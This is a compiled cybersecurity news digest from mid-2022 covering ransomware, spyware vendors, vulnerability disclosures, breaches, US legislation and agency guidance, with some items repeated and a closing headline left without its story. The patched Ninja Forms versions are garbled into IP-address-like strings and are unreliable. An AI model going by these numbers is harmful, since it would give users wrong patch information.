Crowdstrike said in a report on Friday that it observed threat actors using a zero-day in Mitel MiVoice VOIP appliances as a way to gain initial access inside corporate networks for supposed ransomware attacks. The company said it reported the vulnerability (CVE-2022-29499) to Mitel, which released patches here.
Malicious Python packages
Sonatype said it discovered five malicious Python packages that contained functionality to steal AWS credentials and environment variables.
Cobalt Strike update
The Cobalt Strike adversary emulation framework received an update last week with the addition of “thread stack spoofing capabilities.” This new feature allows CS tools to bypass some AVs and EDRs that rely on thread stack inspection to determine the legitimacy of a process that is calling a function or an API.
Social engineering report
Proofpoint has an interesting report out on the most common techniques that threat actors used in social engineering attacks throughout 2021. This includes holding extended conversations with victims to build trust, using existing conversation threads between colleagues, and the use of telephone calls, since victims generally tend to believe that cyber scams usually take place via web-based communication channels only.
The operators of the LockBit ransomware have apparently launched the 3.0 version of their malware over the weekend. In addition, the group also launched a “bug bounty program” where they plan to pay for information on bugs in their encryption code, vulnerabilities in their public infrastructure, or PII data on the members of other ransomware groups.
Malware researcher Mohamed Ashraf has published a deep analysis of the Snake Keylogger, a malware strain developed in .NET. The malware includes functions to steal sensitive information from an infected device, including browser credentials, keystrokes, screenshots of a victim’s screen, and clipboard data.
Palo Alto Networks detailed on Friday the use of “API hammering” as a sandbox evasion technique. API hammering is currently used by malware strains such as Zloader and BazarLoader.
Kaspersky has published a report on the TTPs of the most common eight ransomware families, including Conti/Ryuk, Pysa, Clop (TA505), Hive, Lockbit2.0, RagnarLocker, BlackByte, and BlackCat.
Malware researcher Mohamed Ashraf has published an analysis of APT34’s Saitama Agent, a backdoor trojan that uses DNS tunneling and a finite state machine.
Vulnerabilities get patched slower and slower
DevSecOps firm Snyk has published its yearly State of Open Source Security report, and one of the company’s main findings this year was that the time it took companies to fix vulnerabilities in FOSS projects has more than doubled from 49 days in 2018 to 110 days in 2021.
Two security researchers have published a technical write-up on a vulnerability in the Oracle Fusion middleware tracked as CVE-2022–21445 but also known as the Miracle exploit. The vulnerability allows pre-auth RCE, and the researchers said that it took Oracle roughly six months to patch the issue.
A security researcher from NSFocus has published details about 11 vulnerabilities in CODESYS v2 runtime, used in many industrial products.
The NYTimes Analyzes China’s Surveillance State Plans
The NYTimes spent a year going through over 100,000 government bidding documents, and they’ve constructed a clear vision of what the government is trying to build. The plans include the combined use of cameras, DNA databases, mobile phone access, and microphones to match people’s race, ethnicities, voiceprints, clothing, vehicles, friends, social contacts, etc.—to make most public places into capture zones where they can identify and track people in multiple dimensions. Now add that to the various social credit system plans and you have tremendous leverage over the population. The only upside I see here is that these plans are so draconian, and so transparent, that it could cause many of the most talented to leave the country, and the rest of the world to ostracise China’s government. Hopefully that happens before China fully builds and implements this stuff, and starts exporting it to other would-be authoritarian regimes.
Read more in
- China’s Expanding Surveillance State: Takeaways From a NYT Investigation
- How China Is Policing the Future
BEC Attackers Starting to Impersonate Third-party Vendors
Abnormal Security says BEC attackers are more frequently switching tactics to impersonating third-party vendors and suppliers. This is a switch from mostly impersonating internal executives and other VIPs. They say third-party impersonation made up over half of attacks in May of 2022.
Read more in
Attacker Selling Access to Networks via Atlassian Vuln
An attacker is selling access to 50 different networks that he got access to via the recent Atlassian Confluence vulnerability. The actor said they were also selling access to 10,000 additional hosts that were compromised using the flaw.
Read more in
Chinese Attackers Using Ransomware to Hide Espionage
SecureWorks says Chinese attackers are more frequently using ransomware to make it appear they’re lower-level attackers going after financial gain, when their real goals are likely intellectual property. They estimated that 75% of the targets they looked at are likely interesting to China based on their location and business verticals, e.g., pharmaceutials.
Read more in
- Jun 23, 2022 CHINESE THREAT ACTOR USES RANSOMWARE AS A ‘SMOKESCREEN’ FOR ESPIONAGE By Lindsey O’Donnell-Welch
2 New Cybersecurity Bills Signed Into Law
The Biden administration signed two new bills into law. The first removes red tape that will allow federal workers to share knowledge with multiple agencies. The second improves coordination between DHS and state and local governments.
Read more in
CISA’s Cloud Security Technical Reference Architecture
CISA has released its Cloud Security Technical Reference Architecture, which clarifies considerations for shared services, cloud migration, and cloud security posture management as it fulfills a key mandate in delivering on Executive Order 14028, Improving the Nation’s Cybersecurity.
Read more in
- Executive Order on Improving the Nation’s Cybersecurity
- Cloud Security Technical Reference Architecture
Automatic CAPTCHA With iOS
iOS 16 is looking to solve some of the annoyance of CAPTCHAs by transparently proving to the website that you are a real person. Yes, please. This is also within the theme of “passwordless” with its FIDO2 support of WebAuthN. I love all of it. Super happy to see the mobile phone take more of a dominant role in proving things about ourselves. I mean they know if we’re logged in with our finger or face, right? So why couldn’t they securely pass that on to a given website?
Read more in
U.S. abortion ruling reversal sparks calls for privacy laws
This week saw the U.S. Supreme Court overturn Roe v. Wade, ending guarantees that protect a person’s constitutional right to have an abortion. The ramifications are huge — economically, socially, medically, and in terms of human rights alone — for over a hundred million people living in the United States. That’s made the need for a privacy law more urgent; the U.S. is left far behind most other Western democracies, since there are reasonable fears that data — including from period trackers — can be now used as evidence against people. Tech companies have been left scrambling to figure out what the overturning of Wade means for their employees, which matters because in the U.S. healthcare is tied (inexplicably) to employment, though much of Big Tech has remained largely silent about the ruling itself (even Apple, which says “Privacy is a fundamental human right,” has said nothing.) And now there’s renewed focus on what data tech companies collect, especially in light of @motherboard’s reporting into the sale of location data that can identify people seeking abortions. As EFF’s director of cybersecurity @evacide notes, if companies don’t want their data turned into dragnets, “Don’t have it for sale. Don’t have it when a subpoena arrives.”
Read more in
- Supreme Court’s Roe v. Wade reversal sparks calls for strengthening privacy
- These 3 Supreme Court decisions could be at risk after Roe v. Wade was overturned
- Big Tech silent on data privacy in post-Roe America
Russian hackers targeting U.S. and other Ukraine allies
A report by Microsoft out this week revealed Russian state-backed hackers have attempted to infiltrate networks of more than 100 organizations in the U.S. and 42 other countries allied with Ukraine since Russia invaded in February. The list of targets includes foreign ministries of NATO states but also think tanks, IT groups and energy suppliers. Worse, the hackers successfully broke in about 30% of the time, with data stolen in one-in-four successful intrusions. Estonia was an exception — Microsoft detected “no Russian cyber intrusions” since the start of the war, largely because of its heavy reliance on cloud computing.
Read more in
- Defending Ukraine: Early Lessons from the Cyber War
- Russian hackers targeting U.S., other Ukraine allies
- Microsoft says Russia has stepped up cyber espionage against the US and Ukraine allies
- Microsoft: Russian Cyber Spying Targets 42 Ukraine Allies
Twitter apologizes for abusing user security information after $150M FTC settlement
If you saw a notice on Twitter this week about Twitter’s “use of your personal information for tailored advertising,” it’s thanks to an FTC settlement to the tune of $150 million, after Twitter was caught using information submitted by users for setting up two-factor authentication — email addresses and phone numbers — for targeted advertising. Twitter ceased the practice, and this week apologized in a blog post.
Read more in
- Twitter apologizes for abusing user security information after $150 million FTC settlement
- Twitter admits it used two-factor phone numbers and emails for serving targeted ads
- FTC Charges Twitter with Deceptively Using Account Security Data to Sell Targeted Ads
- Twitter to pay $150 million fine over deceptively collected data
- Twitter’s use of your personal information for tailored advertising
Google warns Hermit spyware is targeting iOS and Android users
An update on the recently discovered commercial-grade spyware by researchers at Lookout, dubbed Hermit, which I mentioned last week. Google has now confirmed Lookout’s findings — which were largely focused on Android. Google has also found an iOS version of the spyware, which packs in six exploits, including two zero-days. Google said that it’s notifying Android users who were targeted by the Hermit spyware, which is believed to be used by governments, and has been deployed in Kazakhstan and Italy. It’s a reminder that NSO isn’t the only spyware maker out there. Google said it’s tracking at least 30 vendors with “varying levels of sophistication and public exposure selling exploits or surveillance capabilities to government-backed actors.”
Read more in
- Google Warns of New Spyware Targeting iOS and Android Users
- Lookout Uncovers Android Spyware Deployed in Kazakhstan
- The curious tale of a fake Carrier.app
- Spyware vendor targets users in Italy and Kazakhstan
Mega says it can’t decrypt your files, a new exploit shows otherwise
Mega has long been billed as an end-to-end encrypted cloud storage provider, which claims that it can’t decrypt the data that it stores. But a new proof-of-concept exploit shows that claim isn’t exactly true. According to new research, “Mega uses to encrypt files is riddled with fundamental cryptography flaws that make it trivial for anyone with control of the platform to perform a full key recovery attack on users once they have logged in a sufficient number of times.” Mega says it’s fixed the security vulnerabilities.
Read more in
- Mega says it can’t decrypt your files. New POC exploit shows otherwise
- MEGA: MALLEABLE ENCRYPTION GOES AWRY
- MEGA Security Update
Researcher hacks into backend for network of smart Jacuzzis
A security researcher found a network of thousands of smart Jacuzzis connected to the internet via an admin panel that was leaking user data, albeit briefly, including owner’s names and email addresses. A second admin panel was also discovered after a teardown of the Android app. It took the Jacuzzi-maker more than six months to fix. Gizmodo has more, and some choice words from @dcuthbert on Jacuzzi’s poor response.
Read more in
- Hacking into the worldwide Jacuzzi SmartTub network
- Hot Tub Crime Machine: Jacuzzi Smart Tubs Left Personal Info Exposed
Strava app flaw revealed runs of Israeli officials at secret bases
A security flaw in the fitness app Strava allowed a disinformation watchdog to identify and track security personnel working at secretive bases in Israel. By uploading fake running “segments,” a user could learn the identities and past routes of others who were active in that particular area, even with the strongest privacy protections on their accounts. Case in point, some 100 individuals who exercised at six secretive Israeli bases were visible. Haaretz ($) has the original report. These latest findings come years after similar security research found that Strava’s heatmaps could identify secret bases and sensitive military installations.
Read more in
- Strava app flaw revealed runs of Israeli officials at secret bases
- Security Breach in Strava Exercise App Used to Spy on Israeli Officials, Reveals Army Bases
- Strava will refresh its heat map every month to clear it of data that recently went private
Are you a bot? Not with a PAT
A new feature in iOS 16 and macOS Ventura (out later this year) will allow Apple device owners to bypass CAPTCHAs by automatically telling apps and websites that you’re not a bot. Apple is partnering with two content delivery networks, Fastly and Cloudflare. The feature uses private access tokens — or PATs — which automatically work with any app or website that’s on Fastly and Cloudflare’s network — which is a lot of them. PATs are cross-platform, as Google, Apple, Cloudflare and Fastly all have contributed to developing this protocol. But so far, no love for Android users. Fastly’s blog post is here.
Read more in
- iOS 16 will let you bypass CAPTCHAs on some apps and websites
- Apple is introducing new tech in iOS 16 to let you skip CAPTCHAs
- Private Access Tokens: stepping into the privacy-respecting, CAPTCHA-less future we were promised
Delivery firm Yodel quiet over cyberattack
Yodel, one of the U.K.’s most widely used parcel delivery services, has been down for days, reports Bleeping Computer, after a reported “cyber incident.” No word from the company yet — ironic, for a company with that name — but later published a brief statement warning that its order tracking is unavailable and parcels “may arrive later than expected.” Not a good look for a company critical to the U.K. supply chain.
Read more in
An unknown hacker has exploited a vulnerability in U.S. crypto firm Harmony’s Horizon Bridge to steal $100 million in Ethereum. Crypto bridges allow users to send cryptocurrency and assets from one blockchain to the other, but are a weak link since they are rarely audited and often built in secrecy. Harmony identified the alleged hacker in a tweet. But Harmony hasn’t said exactly how the breach happened. But one investor warned of a potentially massive security flaw weeks earlier, identifying how the Horizon bridge hinged on a multi-signature wallet, which requires just two signatures to take the goods inside. In short, crypto startups need to be more transparent about how technology is built and who audits it.
Read more in
- Hacker exploits Harmony blockchain bridge, loots $100M in crypto
- Hackers Steal $100 Million by Exploiting Crypto’s Weak Link
US DoE’s National Cyber-Informed Engineering Strategy
The US Department of Energy (DOE) has released its Cyber-Informed Engineering (CIE) Strategy. DoE’s publication notes that “CIE is an emerging method to integrate cybersecurity considerations into the conception, design, development, and operation of any physical system that has digital connectivity, monitoring, or control. CIE approaches use design decisions and engineering controls to mitigate or even eliminate avenues for cyber-enabled attack, or reduce the consequences when an attack occurs.” DoE’s CIE Strategy is supported by five pillars: awareness, education, development, current infrastructure, and future infrastructure.
- I’m not a big fan of the term “Cyber Informed Engineering” as it implies there is still some need for engineering that is NOT “cyber-informed.” The strategy is basically well known and proven “build security in” or “secure by design” concepts that should be integrated into all energy system operational, upgrade, and new system efforts. Given that the world’s energy systems will change quite a bit over the next 20 years, now is the time to do that.
- This is the most hopeful thing that one has heard in this space. In most industries we know what to do; we simply lack the will to do it. The energy sector is an exception. Because of the interdependencies in the grid, securing it is more complex than simply securing all the operators in the grid. Here, we need a strategic approach that goes across enterprises.
- This sprang from the 2019 National Defense Authorization Act for Fiscal Year 2020 which directed DOE to create this CIE strategy. Part of the idea is to engineer a system which is resistant to further attack once penetrated. The CIE in practice summary explains how this should be considered. Note that while this applies to critical infrastructure, there is applicability to important IT systems. Ask if system A is compromised, what could then be reached easily and how you could slow or stop the effectiveness of that lateral movement.
Read more in
- National Cyber-Informed Engineering Strategy (PDF)
- DOE Releases New Strategy on Cyber Engineering Systems
US, UK, New Zealand: Make Sure PowerShell is Securely Configured
Cybersecurity authorities in the UK, the US, and New Zealand have jointly released guidance urging organizations to ensure that they are using secure configurations of PowerShell, and recommending against disabling or removing the command-line tool. The guidance offers specific advice for using PowerShell to detect and reduce abuse.
- PowerShell has gotten a bit of a bad reputation. Many attackers use it to their advantage after they gain access to a system. But there are also many defensive opportunities, and this concise document does a great job in not only outlining how to restrict PowerShell but also showing how to detect malicious uses.
- PowerShell 5 should be removed in favor of version 7 for windows 10/11 and Linux which adds needed security features such as SSH remoting and over-the-shoulder transcription. Leverage the AMSI integration as well as application control to enabler integration with anti-malware components on the endpoint and to restrict what PowerShell is permitted to do. Review the Defense document below for more on detection and properly securing PowerShell.
- This is an excellent resource and one I encourage all cybersecurity professionals to read and implement. In many investigations we investigate we see PowerShell being abused by criminals.
Read more in
- NSA, CISA say: Don’t block PowerShell, here’s what to do instead
- NSA shares tips on securing Windows devices with PowerShell
- Don’t ditch PowerShell to improve security, say infosec agencies from UK, US, and NZ
- Keeping PowerShell: Security Measures to Use and Embrace (PDF)
Multiple Vulnerabilities in Operational Technology Devices
Researchers from Forescout’s Vedere Labs have published a report detailing 56 vulnerabilities affecting operational technology (OT) devices. The vulnerabilities affect products from 10 vendors, including Honeywell, Emerson, Motorola, Siemens, JTEKT, Bentley Nevada, Phoenix Contact, Omron, and Yogogawa. The vulnerabilities include remote code execution (RCE); denial-of-service (DoS); file/firmware/configuration manipulation; compromise of credentials; and authentication bypass.
- The sad part is not the number of the vulnerabilities, but the type of vulnerabilities. It shows how many of these OT devices controlling critical infrastructure suffer from vulnerabilities that home security systems fixed (for the most part) years ago.
- Operational Technology (OT) covers an enormous range of devices and uses. The only real common denominator is they all started out without thinking at all about “build security in” or “secure by design.” The only hope of changing that is making sure those requirements/concepts are part of procurements of new equipment – any OT items in use today have to be segmented/shielded etc.
- The guidance from Forescout, resulting from their OT:ICEFALL project, is to not wait for CVEs for your OT prior to taking actions to secure them. They have manufacturer-specific recommendations and segmentation, monitoring, patching, and identification of vulnerabilities are a good idea across the board. Make sure that your scanning and assessment teams know how to interact with OT/ICS systems without doing harm.
Read more in
- OT:ICEFALL: 56 Vulnerabilities Caused by Insecure-by-Design Practices in OT
- Industrial Cybersecurity Alert: 56 Insecure-by-Design Flaws
- CISA warns over software flaws in industrial control systems
- Discovery of 56 OT Device Flaws Blamed on Lackluster Security Culture
- ICS Vendors Respond to OT:Icefall Vulnerabilities Impacting Critical Infrastructure
- CISA Releases Security Advisories Related to OT:ICEFALL (Insecure by Design) Report
Malware Infects Networks at Two Texas Hospitals
Two Texas hospitals have notified patients that their personal health information (PHI) may have been compromised after the organizations’ networks were infected with malware. Baptist Medical Center and Resolute Health Hospital learned of the breach in April. The potentially compromised data include Social Security numbers, health insurance information, diagnoses, and billing information.
- Looks like attackers had over 3 weeks on target, including 4 days after the malware was first detected. Not a lot of data on this one, but looks like 1.2M individuals impacted, so this is an expensive one – just the costs of offering identity theft protection are likely to exceed the proactive cost that would have avoided or minimized the damage.
- We’ve been noting the security of health devices, and focusing on segmentation, access control and updates; don’t forget the back-end systems. Ensure sufficient protections are in place not only from medical systems but also any public facing system. You say you have your IDS and WAF all set – have you verified they work? Nothing in learning mode? That someone is responding to configured alerts?
Read more in
Cloudflare Outage Due to Network Configuration Issue
An outage affecting traffic in 19 Cloudflare data centers on Tuesday, June 21, was the result of a problematic network configuration change. The outage caused some websites and services to become unavailable. The issue was resolved within 90 minutes.
- It is becoming a buzzword to call information/cybersecurity “resiliency,” but this incident is an important reminder that security is really a subset of overall reliability/resilience. While Availability has been part of the Confidentiality/Integrity/Availability triad forever, security issues generally aren’t the top driver of downtime in most organizations. Important to plan for how IT admin code changes that crash systems or network admin config changes that cause self-inflicted denial of service storms impact your ability to continue to deliver security services.
- Even the best of us get bit by BGP changes. Cloudflare is working to make their architecture more robust and less susceptible to network configuration errors. In so doing the configuration updates to that model resulted in the same outages they wish to avoid. When successful their architecture and lessons learned can be leveraged to help others become more resistant to these issues.
Read more in
CISA Publishes Revised Version of Cloud Security Technical Reference Architecture
The US Cybersecurity and Infrastructure Security Agency (CISA) has released the second version of its Cloud Security Technical Reference Architecture (TRA), which provides guidance for federal agencies to securely migrate to cloud services. The first version of the Cloud Security TRA was published in September 2021.
- With many organisations engaging with the cloud over the past two years as a result of the pandemic, this is a good resource to use to review and ensure any migrations to the cloud your organization has undertaken is done so in a secure way.
Read more in
- Cloud Security Technical Reference Architecture (PDF)
- CISA Issues Revised Cloud Security TRA
- CISA releases second version of secure cloud migration guidance for agencies
New US Cybersecurity Laws
Two US cybersecurity-related bills have been signed into law. The Federal Rotational Cyber Workforce Program Act of 2021 paves the way for IT, cybersecurity, and related workers to use their skills across multiple agencies. The Local Government Cybersecurity Act “fosters cybersecurity coordination between the Department of Homeland Security and state and local actors.”
- This should make it easier to work cross-agency, and while DHS and CISA have the charter and authority, this removes many barriers to success.
Read more in
- Pair of Brand-New Cybersecurity Bills Become Law
- H.R.3599 – Federal Rotational Cyber Workforce Program Act of 2021
- Neguse, Peters State And Local Government Cybersecurity Bill Heads to President’s Desk for Signature
Cyberattack May Have Set Off Israeli Air Raid Sirens
The Israeli National Cyber Directorate (INCD) suspects that a cyberattack may be responsible for air raid sirens sounding in Jerusalem and Eilat on Sunday, June 19. The affected sirens were municipal rather than military. INCD published suggested remediations for similar systems.
- While this is likely just Iran poking at Israel as part of their ongoing disputes, it’s still a good idea to make sure that you have properly secured your emergency communication systems, that access is regularly verified, to include new integrations or connections to ensure the level of security is not reduced over time. Excessive false positives, or even too much testing, will reduce their effectiveness in a true emergency.
Read more in
- Cyberattack Blamed for Setting Off Rocket Sirens in Israel
- Israeli air raid sirens triggered in possible cyberattack
CISA Warns of Hillrom Medical Device Vulnerabilities
The US Cybersecurity and Infrastructure Security Agency (CISA) has issued a warning about two vulnerabilities affecting Hillrom Medical heart monitors. Hillrom is releasing updates to fix the hard-coded password and improper access control issues.
- Hillrom is releasing more than one patch. Note the timelines for the fixes, some due in late 2023.
Read more in
- Federal Authorities Warn of Cardio Product Security Flaws
- ICS Medical Advisory (ICSMA-22-167-01) | Hillrom Medical Device Management
Bill Would Require Regular Medical Device Security Requirement Updates from FDA
US legislators are considering a bill that would require the Food and Drug Administration (FDA) to update medical device cybersecurity requirements regularly. The Strengthening Cybersecurity for Medical Devices Act would require the FDA to review and amend premarket medical device cybersecurity guidance every two years.
Read more in
Guilty Verdict in 2019 Capital One Breach
Former Amazon software engineer Paige Thompson has been found guilty of wire fraud and computer intrusion in connection with the 2019 Capital One breach. The incident resulted in the theft of payment card application data belonging to 100 million individuals. Thompson scanned for misconfigured AWS accounts and stole data from at least 30 organizations.
- The key quote is “According to the US Attorney’s office, Thompson used a tool to scan AWS accounts in search of misconfigurations.” If Capital One, and the other 29 vulnerable AWS users Thompson found with vulnerabilities, had run that tool first, damage would have been avoided. Even better would be cloud service providers routinely scanning and notifying their customers of vulnerable configurations. Amazon, Google and Microsoft seem very good at targeting advertising (for free) to *potential* cloud service customers – seems like a no-brainer for them to be able to do targeted alerts (for free) to existing customers.
Read more in
- Capital One: Convicted techie got in via ‘misconfigured’ AWS buckets
- Jury Convicts Seattle Woman in Massive Capital One Hack
WordPress Ninja Forms Vulnerability Fixed
A critical code injection vulnerability in the Ninja Forms WordPress plug-in can be exploited to execute arbitrary code or delete arbitrary files. The plug-in has more than one million active installations. The flaw has been fixed in Ninja Forms versions 184.108.40.206, 3.1.10, 3.2.28, 220.127.116.11, 18.104.22.168, 22.214.171.124, and 3.6.11.
- Do not patch this plugin. Uninstall it, and while you are at it either uninstall as many of these plugins as you can or move your WordPress site to a hosted/managed solution.
- (This is me, not repeating my usual caution about WordPress plugins.)
Read more in
- WordPress Plug-in Ninja Forms Issues Update for Critical Bug
- PSA: Critical Vulnerability Patched in Ninja Forms WordPress Plugin
Flagstar Bank Discloses Data Breach
Michigan-based Flagstar Bank has disclosed that a cyberattack against its network led to the compromise of personal information belonging to 1.5 million of its customers. Flagstar’s corporate network was breached in December 2021; the bank learned that customer data were exposed on June 2, 2022. Flagstar experienced a previous cyberattack; it was the victim of ransomware in January 2021.
- This is a very good cautionary tale to use with your management: in January 2021, Flagstar had a vulnerable Accellion server get exploited in a ransomware attack, customer information was exposed and Flagstar “…engaged a team of third-party forensic experts to investigate and determine the full scope of this incident.” Any expert engagement should have included recommendations to deal with overall security gaps, not just the Accellion issue. If that was acted on, Flagstar should have at least been much faster to detect this latest compromise – they state the attackers had 4-6 months on target (Date(s) Breach Occurred: 12/03-04/2021, Date Breach Discovered: 06/02/2022) – that is a bad metric for a small business, unacceptable for a bank as large as Flagstar that had over $500M in profits in 2021. Cost to avoid the second breach would have been a small fraction of that profit and likely would have been less than the direct costs Flagstar will see from this latest incident.
Read more in
Proposed Legislation in US Senate Would Ban Sale of Health and Location Data
A bill introduced in the US Senate would prohibit data miners from selling location and health data. The Health and Location Data Protection Act would also require the Federal Trade Commission (FTC) to establish rules for implementing the law within 180 days of the bill’s passage.
- The real news here is that the sale of health and location data is a business in the first place. There are many legitimate reasons why applications collect health and location data, but selling the data shouldn’t be one of them.
- Even politically neutral national data privacy legislation almost never gets passed by US legislators. The broader data privacy legislation that has been proposed should cover Personal Health Information, vs. have individual data types of privacy-sensitive information have different laws.
Read more in
- Ban on sale of health data by brokers introduced in Senate ahead of abortion ruling
- Abortion rights: US senators seek ban on sale of health location data
International Effort Disrupts Russian Botnet
The US Department of Justice (DoJ) and law enforcement agencies in the Netherlands, Germany, and the UK, have dismantled the infrastructure of a Russian botnet. The botnet, known as RSOCKS, comprised millions of devices around the world, including Internet of Things (IoT) devices, Android devices, and other computers. The botnet was operating as a proxy service, but was offering IP addresses from devices it had compromised rather than legitimately obtained IP addresses.
Read more in
- US disrupts Russian botnet that ‘hacked millions of devices’
- Feds Take Down Russian ‘RSOCKS’ Botnet
- DOJ seizes proxy service as US, partners hit Russian hackers
- Russian Botnet Disrupted in International Cyber Operation
Rapid7 Report: Types of Data Most Often Targeted by Ransomware Operators
According to a report from Rapid7, ransomware operators seem to prefer certain types of data over others. According to the report, financial sector organizations more likely to experience ransomware attacks than organizations in other sectors. Ransomware operators target sensitive customer data, employees’ personally identifiable information (PII), and human resources data.
- Since protecting all data to the same level is either ineffective or inefficient, this information can be useful.
Read more in
- Ransomware attacks: This is the data that cyber criminals really want to steal
- New Report Shows What Data Is Most at Risk to (and Prized by) Ransomware Attackers
BRATA Malware Gains New Features
The BRATA banking trojan has recently added several new features to its capabilities. Analysts from Italian security company Cleafy have detected changes in the ways BRATA, which is an acronym for Brazilian Remote Access Tool Android, conducts its attacks. According to Cleafy, “the [malware’s] modus operandi now fits into an Advanced Persistent Threat (APT) activity pattern.” BRATA threat actors have begun to launch more narrowly targeted attacks, focusing on one financial institution at a time. It also uses new methods of obtaining permissions to access location data, and to send and receive SMS.
Read more in
- BRATA is evolving into an Advanced Persistent Threat
- Android-wiping BRATA malware is evolving into a persistent threat
- BRATA Android Malware Gains Advanced Mobile Threat Capabilities
- This phone-wiping Android banking trojan is getting nastier
Vulnerability in Cisco Small Business Routers
Cisco will not release updates to address a flaw affecting several models of its small business routers because the devices “have entered the end-of-life process.” The vulnerability could be exploited to allow remote code execution or to create denial-of-service conditions. According to a Cisco security advisory, the “vulnerability is due to insufficient user input validation of incoming HTTP packets.” Users are urged to migrate to newer routers.
- One can usually replace these routers for less than the cost of the time to repair, were a patch even available.
Read more in
- Cisco says it won’t fix zero-day RCE in end-of-life VPN routers
- Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers Remote Command Execution and Denial of Service Vulnerability
Siemens Fixes Flaws in SINEC Network Management System
Researchers from Claroty’s Team82 found more than a dozen vulnerabilities in Siemens SINEC network management system (NMS). The flaws leave vulnerable systems open to denial-of-service attacks, credential leaks, and remote code execution. Siemens released an update that address the vulnerabilities in October 2021.
Read more in
- SSA-163251: Multiple Vulnerabilities in SINEC NMS (PDF)
- Securing Network Management Systems (Part 3): Siemens SINEC NMS
- Over a Dozen Flaws Found in Siemens’ Industrial Network Management System
Google TAG says it tracks 30 surveillance vendors
There are three tech companies today that have a unique and comprehensive view of people’s online lives. These are Apple, Google, and Microsoft, all of which are behind today’s top operating systems, as well as some of the Internet’s most popular online services.
For Google, the signals it acquires from Gmail, Drive, Chrome, and Android allow the company remarkable insight into today’s threat landscape. For example, Google can see what types of threats are hitting your Android devices and your email inbox, even if those threats target other operating systems where Google doesn’t have great visibility into.
Over the years, Google has dedicated significant efforts and funds to boosting its security teams to take advantage of this unique position, and, once in a while, the company makes a statement that reveals the scope of a particular problem or topic.
One of those days was yesterday. In a blog post on Thursday, the Google Threat Analysis Group (TAG), the Google security team that tracks advanced threats, revealed that they are aware of and currently tracking more than 30 organizations selling surveillance capabilities to government-backed threat actors.
This quite large number highlights that while the public’s attention has been captured by a few vendors like Hacking Team, Gamma Group, NSO Group, and Candiru, there are far more entities that engage in similar operations in an industry that has been loosely regulated over the past decade.
The latest Google TAG report adds new information about RCS Lab, an Italian company that used to be a reseller for the old HackingTeam, but has now moved into creating and selling its own tools.
The company was at the center of a first report last week when mobile security firm Lookout published an analysis of Hermit, a piece of Android malware packed with different exploits, which Lookout said it initially found being deployed in Kazahstan in April this year. Further sleuthing also found the same malware being deployed in Syria, and in Italy, in both 2019 and 2021, as part of law enforcement anti-corruption investigations, according to documents released by the Italian government.
Google TAG’s report effectively confirms Lookout’s findings and adds more depth, especially on the Hermit’s malware use inside Italy, where Google said that the entity which deployed the malware appears to have worked with local ISPs to disable the target’s mobile connection before sending an SMS message telling the victim to install an ISP-themed mobile app to restore their connection.
Furthermore, Google also confirmed that RCS Lab also has iOS exploits in their arsenal, namely CVE-2021-30983 (aka Clicked2), which Google’s Project Zero team analyzed in a different blog post here, and which Apple patched last December. But this was just one of the six iOS exploits RCS Labs had packed into the malicious iOS app.
Now, Google says that while everyone has been fixated on taking down NSO Group, other vendors have been slowly growing in the Israeli company’s shadow.
“[T]he commercial spyware industry is thriving and growing at a significant rate,” Google TAG’s Benoit Sevens and Clement Lecigne said. “This trend should be concerning to all Internet users. ”
These vendors are enabling the proliferation of dangerous hacking tools and arming governments that would not be able to develop these capabilities in-house. While use of surveillance technologies may be legal under national or international laws, they are often found to be used by governments for purposes antithetical to democratic values: targeting dissidents, journalists, human rights workers and opposition party politicians.
Aside from these concerns, there are other reasons why this industry presents a risk to the Internet. While vulnerability research is an important contributor to online safety when that research is used to improve the security of products, vendors stockpiling zero-day vulnerabilities in secret poses a severe risk to the Internet especially if the vendor gets compromised. This has happened to multiple spyware vendors over the past ten years, raising the specter that their stockpiles can be released publicly without warning.
Carnival Cruise settlement
US cruise line Carnival Cruise has agreed to pay $1.25 million in a multi-state settlement over its 2019 data breach. The money will be divided between 46 states and residents impacted by the incident. Read more:
- Idaho Joins $1.25 Million Settlement over 2019 Carnival Cruise Data Breach
- Connecticut Co-Leads $1.25 Million Multistate Settlement Over 2019 Carnival Cruise Line Data Breach
- AG SHAPIRO SECURES SETTLEMENT OVER CARNIVAL CRUISE DATA BREACH
- 1.25 million for consumers affected by Carnival Cruise Line’s data breach
CS:GO skin heist
A hacker has stolen more than $2 million worth of Counter-Strike: Global Offensive skins from a collector’s private Steam inventory, including seven rare and highly-prized AWP Dragon Lore skins, considered some of the most expensive skins that CS:GO players can own. The hack is currently considered the largest theft in the game’s history. Read more: Hacker steals $2 million in CS:GO skins
New Instagram feature
Meta announced on Thursday that they are testing a new way for users to verify their age on the platform. “If someone attempts to edit their date of birth on Instagram from under the age of 18 to 18 or over, we’ll require them to verify their age using one of three options: upload their ID, record a video selfie or ask mutual friends to verify their age,” the company said. Read more: Introducing New Ways to Verify Age on Instagram
Chrome 103 is out
Google has released v103 of its Chrome web browser this week. While the usual security fixes and dev/API-related changes shipped with this release, there were also loads of new features that went live for the Chrome for iOS release. Among the most important new feature was the news that Google’s Enhanced Safe Browsing feature is now available for iPhone users, something that has been available for all the other Chrome users since last year.
7-Zip now supports MotW
7-Zip v22, released last week, supports Mark-of-the-Web, a Windows security feature that has been long requested by security firms and antivirus makers. 7-Zip now becomes the fifth major file archiving software on Windows to support this feature, after WinRAR, WinZip, Eplzh, and Bandizip. Read more: 7-zip now supports Windows ‘Mark-of-the-Web’ security feature
NSA and allies on PowerShell
Cybersecurity authorities from the US, the UK, and New Zealand have released a joint security advisory on the proper configuration and monitoring of PowerShell on Windows systems. A surprise to many, the three agencies didn’t universally recommend removing or disabling PowerShell entirely, as there are benefits to having it enabled on a local network. The US NSA, the UK NCSC, and the NZ GCSB said that their recommendations “will help defenders detect and prevent abuse by malicious cyber actors, while enabling legitimate use by administrators and defenders.” Read more: NSA, Partners Recommend Properly Configuring, Monitoring PowerShell in New Report
CISA wants a cybersecurity hotline
Members of the CISA Cybersecurity Advisory Committee proposed the creation of an emergency “311” cybersecurity call line for incidents affecting small and medium-sized businesses, The Record reported on Wednesday. The idea has received positive feedback and approval on social media, although there is a fear the hotline will turn into a tech support line if not implemented correctly. Details about how this will work are still unclear, though. Read more: CISA experts propose ‘311’ cybersecurity emergency call line for small businesses
Long CISA onboarding
The same CISA Cybersecurity Advisory Committee also recommended that the agency cut its onboarding process for new employees from the current 198 days to 90 days, Federal News Network reported. “The process is lengthy and difficult to navigate both internally and externally, and therefore places CISA at a tremendous disadvantage relative to private sector employers for this critical and highly sought-after talent pool,” the report [PDF] states. Read more: CISA advisors recommend agency cut onboarding time to 90 days
US spy agencies prepared to loosen hiring rules
